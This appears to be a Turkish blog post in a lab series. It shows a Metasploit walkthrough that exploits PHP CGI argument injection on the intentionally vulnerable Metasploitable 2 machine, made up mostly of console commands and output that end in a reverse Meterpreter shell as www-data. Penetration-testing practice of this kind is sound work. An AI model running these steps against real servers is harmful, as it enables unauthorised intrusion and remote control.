SECURITY GENEL

Metasploitable 2 Exploit PHP CGI

Metasploitable 2 Exploit PHP CGI

Exploit # 11 : PHP CGI

PHP CGI ile kullanıcı ile sunucu arasında etkileşimde kullanılan bir modüldür. Kullanıcı tarafından gönderilen istekler ile sunucu tarafında iş yaptırılır.

 

msf exploit(java_rmi_server) > search php cgi

 

Matching Modules

================

  Name                                              Disclosure Date       Rank    Description

  —-                                              —————       —-    ———–

  exploit/linux/http/linksys_apply_cgi              2005-09-13 00:00:00 UTC  great   Linksys WRT54 Access Point apply.cgi Buffer Overflow

  exploit/multi/http/php_cgi_arg_injection          2012-05-03 00:00:00 UTC  excellent  PHP CGI Argument Injection

  exploit/unix/webapp/awstats_migrate_exec          2006-05-04 00:00:00 UTC  excellent  AWStats migrate Remote Command Execution

  exploit/windows/http/php_apache_request_headers_bof  2012-05-08 00:00:00 UTC  normal PHP apache_request_headers Function Buffer Overflow

 

 

msf exploit(java_rmi_server) > use exploit/multi/http/php_cgi_arg_injection

msf exploit(php_cgi_arg_injection) > show options

 

Module options (exploit/multi/http/php_cgi_arg_injection):

  Name      Current Setting  Required  Description

  —-      —————  ——–  ———–

  Proxies                    no     Use a proxy chain

  RHOST                      yes    The target address

  RPORT     80            yes    The target port

  TARGETURI                  no     The URI to request (must be a CGI-handled PHP script)

  URIENCODING  0             yes    Level of URI URIENCODING and padding (0 for minimum)

  VHOST                      no     HTTP server virtual host

 

Exploit target:

  Id  Name

  —  —-

  0   Automatic

 

msf exploit(php_cgi_arg_injection) > set RHOST 172.16.52.133

RHOST => 172.16.52.133

msf exploit(php_cgi_arg_injection) > exploit

 

[*] Started reverse handler on 172.16.52.128:4444

[*] Sending stage (39217 bytes) to 172.16.52.133

[*] Meterpreter session 2 opened (172.16.52.128:4444 -> 172.16.52.133:40242) at 2013-07-28 14:32:51 +0300

 

meterpreter > shell

Process 25618 created.

Channel 0 created.

uname -a

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

whoami

www-data

 

Etiketler

İlgili Makaleler

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Başa dön tuşu
Kapalı